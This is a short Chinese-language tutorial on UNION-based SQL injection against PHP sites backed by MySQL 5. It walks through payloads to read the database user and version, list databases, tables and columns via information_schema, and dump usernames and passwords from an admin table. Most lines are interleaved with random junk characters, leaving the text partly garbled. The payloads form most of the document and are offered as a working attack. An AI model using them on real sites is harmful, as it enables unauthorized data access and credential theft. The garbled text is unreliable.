" h' @* W" N8 }教程内容:Mysql 5+php 注入" e3 m! t* ]4 E6 p4 g
- |; u5 g) U. m: d
2 a- [& L" Z' j# V$ n. ~& |+ z! c K; T
一.查看MYSQL基本信息(库名,版本,用户)( o/ j( K* Z4 S5 C( H4 E1 f& g
1 Y" \1 R7 j9 k+ Q% p# f3 I0 c, zand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*) [) s: M8 ~* b [" T+ F
! R6 t2 e6 M! \$ \
二.查数据库4 E3 a4 A+ P6 E' R$ _4 K- m( M4 e
0 p+ o' N9 M' a2 a- A7 T! j5 L9 Sand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
2 [6 o. V% r$ [& @ z' d5 climit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
) k1 [) @2 b' M8 y( Z' d
. v- W5 M b {, Z" q) V/ _' }三.暴表2 i' e3 p$ }8 y6 g6 D! c8 d
9 t0 S, B( \8 _- Cand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*# B8 t0 ]) N/ ?# I1 M
8 q) w! a( J- a7 d* alimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
# {0 Z& Z$ d0 D" {2 f5 H; d$ l& M1 z4 M# ~7 X& Y, n/ D* o
四.暴字段
1 v0 M0 _6 P: i! a0 Z4 R" s
3 T( \- w2 ?: y7 f- band 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
6 ]. M+ [0 ~9 Q* @
+ p5 o; f/ x3 h- y, B+ h' w ^ L+ glimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。: O5 {# i ~- L4 n0 a% l, I) c
7 ~; g$ e- w8 J Y五.暴数据; V* V0 @5 z8 B c5 ?( u. S
3 N. q; u) u, R
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
5 A- L2 q( l# N" H1 j$ ` I9 C! e' r+ _0 e+ J# `* z
$ t, L, [$ ]7 J) b0 z7 ^这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
7 a3 P3 b; k& h+ s$ D/ G; ] j |